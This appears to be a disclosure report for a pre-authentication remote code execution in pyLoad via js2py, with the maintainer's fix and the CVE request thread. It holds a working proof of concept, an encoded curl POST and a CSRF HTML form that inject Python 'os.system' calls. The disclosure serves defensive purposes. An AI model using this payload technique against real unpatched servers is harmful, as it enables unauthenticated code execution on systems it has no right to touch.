Pre-auth RCE in pyload/pyload


Reported on

Jan 1st 2023


An unauthenticated attacker can execute arbitrary python code by abusing js2py functionality.

Also, due to the lack of CSRF protection, a victim can be tricked to execute arbitrary python code.

Proof of Concept

Run the command below and touch /tmp/pwnd gets executed.

curl -i -s -k -X $'POST' \
    -H $'Host:' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
    --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%74%6f%75%63%68%20%2f%74%6d%70%2f%70%77%6e%64%22%29;f=function%20f2(){};&passwords=aaaa' \

Decoded jk parameter: pyimport os;os.system("touch /tmp/pwnd");f=function f2(){};

You can also send the url of a website that hosts the HTML file below to a victim.

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="package" value="xxx" />
      <input type="hidden" name="crypted" value="AAAA" />
      <input type="hidden" name="jk" value="pyimport&#32;os&#59;os&#46;system&#40;&quot;touch&#32;&#47;tmp&#47;pwnd&quot;&#41;&#59;f&#61;function&#32;f2&#40;&#41;&#123;&#125;&#59;" />
      <input type="hidden" name="passwords" value="aaaa" />
      <input type="submit" value="Submit request" />


This vulnerability is capable of executing arbitrary python code.

We are processing your report and will contact the pyload team within 24 hours. 3 months ago
bAu submitted a
3 months ago
3 months ago


@admin Hi. It seems that is the email address to report a vulnerability according to

We have contacted a member of the pyload team and are waiting to hear back 3 months ago
pyload/pyload maintainer gave praise 3 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
pyload/pyload maintainer validated this vulnerability 3 months ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pyload/pyload maintainer marked this as fixed in 0.5.0b3.dev31 with commit 7d73ba 3 months ago
bAu has been awarded the fix bounty
This vulnerability will not receive a CVE
pyload/pyload maintainer published this vulnerability 3 months ago
3 months ago



Do you mind requesting a CVE for this vulnerability?

pyload/pyload maintainer
3 months ago

Do you mind requesting a CVE for this vulnerability?

How do you so? I cannot see any option for that.

3 months ago


@admin Could you please assign a CVE?

3 months ago


On it :)

Ben Harvie
3 months ago


A CVE has now been assigned to this report as requested:)

3 months ago



to join this conversation